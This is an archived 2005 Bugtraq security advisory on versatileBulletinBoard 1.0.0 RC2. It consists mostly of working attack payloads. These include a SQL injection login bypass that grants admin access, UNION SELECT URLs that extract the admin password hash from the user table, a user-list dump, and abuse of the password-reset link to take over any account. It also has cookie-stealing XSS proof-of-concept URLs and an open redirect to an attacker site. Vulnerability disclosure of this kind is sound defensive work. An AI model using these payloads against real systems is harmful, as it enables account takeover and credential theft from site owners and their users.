[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051010222315.473.qmail@securityfocus.com>
Date: 10 Oct 2005 22:23:15 -0000
From: rgod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL injection vulnerabilities / login bypass / board takeover
versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure
software:
site: http://vbb.eniki.de/
if magic_quotes_gpc off...
A)
i)SQL INJECTION / LOGIN BYPASS
you can login as admin typing;
login: ' or 1 and name='[adminname]'/*
pass: [whatever]
also you can login with the credentials/rights of any user, typing:
login: ' or 1 and name='[username]'/*
pass: [whatever]
ii) SQL INJECTION in "search this thread" feature when you surf the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickame]'/*
(you can't do it manually, input field is too small, but you can modify the POST...)
iii)SQL INJECTION in index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
iv)SQL INJECTION in index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
(to list USER ID number of any user, this will be useful after, you will see... however, usually user ID for admin is "11")
v)SQL INJECTION in "to" argument when you post a private message (you need to login to do this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*
vi)SQL INJECTION in search for posts feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*
vii)SQL INJECTION:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*
viii) SQL INJECTION when you see a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
with ii), iii), iv), v), vi), vii), viii) you will see admin MD5 password hash at screen
ix) SQL INJECTION, you can list all users, this could be useful to dump all passwords from database:
http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*
to see if your installation is vulnerable just digit ' in login field, if you have a SQL error, it is
x) SQL INJECTION in "forgot password" feature, a user could manipulate the email field to send himself new passwords for any admin/user
you will receive a link like this:
http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]
to set up a new password, but... you can call this url at any time if you have the hash
combinating theese issues a user can take the full control of the board, reset all passwords...
proof of concept exploit incoming...
B)
xi) XSS:
possible cross site scripting, you can craft a malicious url to redirect a user to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]
and you can manipulate user cookies, poc:
http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>
also, you can craft malicious urls that manipulating sql queries will show some evil javascript, poc:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*
C)
xii) information disclosure:
this is an online utility, but to list all files and versions doesn't seem very safe ;)
http://[target]/[path]/getversions.php
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html
Powered by blists - more mailing lists